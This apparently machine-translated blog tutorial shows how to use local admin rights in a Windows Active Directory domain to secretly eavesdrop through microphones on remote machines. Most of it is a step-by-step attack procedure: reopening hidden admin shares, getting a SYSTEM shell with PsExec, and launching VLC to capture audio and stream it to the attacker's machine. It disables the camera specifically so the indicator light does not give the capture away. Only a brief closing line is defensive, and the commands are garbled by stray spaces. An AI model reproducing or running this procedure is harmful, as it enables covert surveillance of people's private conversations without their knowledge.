We overhear in AD

Introduction
I just recently encountered Windows Active Directory domains and learn a lot of new and surprising. It so happens that a significant number of users in the organization's domain have the rights of local administrators (technical specialists, programmers and others) (after all, it is not uncommon that happens?). But the consequences of this are colossal. In this article we will look at how you can eavesdrop on sounds (conversations, conversations) on remote machines.

Must have

• User in AD with local admin rights (or just know the password from local admins)
• Hardware sound capture (microphone) on the target machine. The most convenient case - the target machine is a laptop, there is a built-in microphone (and camera: D). We were also lucky if we use a webcam or headphones with a microphone on a remote machine. Otherwise, you can often stick the microphone yourself without the fawn.
• The program capture and transfer of multimedia over the network. We will use the player vlc . (no Trojans! :))
• The program remote start processes. Use psexec from the PsTools suite. Great for AD, but to use it, you just need to have local admin rights on the target machine. It is noteworthy that the running processes are executed on behalf of SYSTEM (!).

Practice

1. First we need to throw the vlc distribution on the remote machine, if it was not there. This can be done by using system resources like C $, D $ ... that is, \\ target \ C $ \ . If the shared resources are not open (it means they are specially closed), then it will be possible to open the shared network resource using PsExec with a command like this:
   net share C $ = C: \
   The $ symbol at the end means that the network resource will not be displayed in the list of the computer’s open network resources. And so, in a trivial way we throw the vlc distribution on the remote machine.
2. Next, to run vlc, we need cmd from the remote machine. We use PsExec by executing a command like:
   psexec.exe \\ target \ cmd
   Respectively we will receive cmd from the target machine. The windows of running programs will not be displayed on it (will be, if you use the -i switch in PsExec). By the way, PsExec is able to upload the launched file to the remote machine, if you specify the -c option. Go to the folder with the vlc distribution.
   
3. Now the most interesting: start vlc with necessary parameters. To determine the command line parameters for running vlc, we will run it on our site, set the necessary settings and see what the command is. Run vlc, press media -> streaming. Tab "Capture Device". The video device will be set to "no" to avoid unnecessary errors in the absence of the camera and the detection of us, if the light on the camera lights up. Put a tick in the bottom "additional parameters" and look at the parameters of the command line.
   
   We take from there " dshow: // " (that is, the source is capture devices) and " : dshow-vdev = none: dshow-adev =: dshow-caching = 200 " (that is, the video device is not; audio device is by default; caching - 200 ms.). Now we need to set up broadcasting of our multimedia, we are waiting for the “Stream”. In the destination path add the desired path. I chose http with port 8080, i.e. a web server is running on the target machine from which to listen. It is preferable, of course, to choose a broadcast to our car (or not ours, from where to redirect using netcat). Remove the checkbox "enable transcoding". Go to the settings tab and copy the resulting settings.
   
   I have this " : sout = # http {mux = ffmpeg {mux = flv}, dst =: 8080 /}: no-sout-rtp-sap: no-sout-standard-sap: sout-keep "
4. Thus, the command to start vlc on a remote machine takes the form:
   vlc.exe dshow: //: dshow-vdev = none: dshow-adev =: dshow-caching = 200: sout = # transcode {vcodec = h264, vb = 0, scale = 0, acodec = mp4a, ab = 128, Channels = 2, samplerate = 44100}: http {mux = ffmpeg {mux = flv}, dst =: 8080 /}: no-sout-rtp-sap: no-sout-standard-sap: sout-keep
   We can run. If all is well, the target machine is already awaiting our connection on port 8080.
5. We start our vlc on our machine, with which we will listen. If you are connecting to a web server, then you can start with the following arguments:
   vlc.exe http: // target: 8080 (no space after http: //)
   If there is a broadcast on our computer (for example, via udp on port 1234), then start vlc as follows:
   vlc.exe udp: // @: 1234
6. If all the way, then listen

Conclusions
It is very important to minimize the privileges of AD users.
PsExec works through the public domain admin $, but its closure can negatively affect the work in AD. How exactly, not googled, but you never know.
With some modifications, the method will roll not only in AD.

Links
Good PsExec Description
Wiki on VLC.